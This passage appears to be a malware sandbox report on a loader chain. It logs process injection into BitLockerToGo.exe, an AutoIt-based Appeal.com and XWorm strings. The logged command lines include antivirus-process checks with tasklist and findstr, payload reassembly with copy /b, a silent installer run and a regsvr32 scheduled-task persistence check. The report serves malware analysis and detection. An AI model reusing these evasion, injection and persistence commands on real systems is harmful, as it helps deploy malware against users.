Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 320000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 321000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 365000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 367000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 375000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 674008
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 444000
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

20_2_00471B4D

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0041338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

20_2_0041338B

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0047BBED SendInput,keybd_event,

20_2_0047BBED

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0047EC6C mouse_event,

20_2_0047EC6C

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe "C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe "C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe "C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe "C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe "C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe "C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe "C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe "C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1888 -ip 1888
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 948
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_004714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

20_2_004714AE

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_00471FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

20_2_00471FB0

Source: Appeal.com, 00000014.00000002.3538452802.00000000004D3000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4194977140.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2X
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4194977140.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4194977140.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Appeal.com	Binary or memory string: Shell_TrayWnd
Source: skotes.exe, skotes.exe, 00000006.00000002.4186184510.0000000000808000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: lkProgram Manager
Source: 8a7032211b.exe, 0000001D.00000002.3040862009.00000000005F4000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: ?Program Manager
Source: 714ab8b5fd.exe, 00000021.00000002.3202169749.000000000038E000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: vProgram Manager
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4194977140.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4194977140.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0062D3E2 cpuid

6_2_0062D3E2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053885001\fb2bfd0ee0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053885001\fb2bfd0ee0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053886001\8d05ec9382.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053886001\8d05ec9382.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053887001\cf666bd85d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053887001\cf666bd85d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
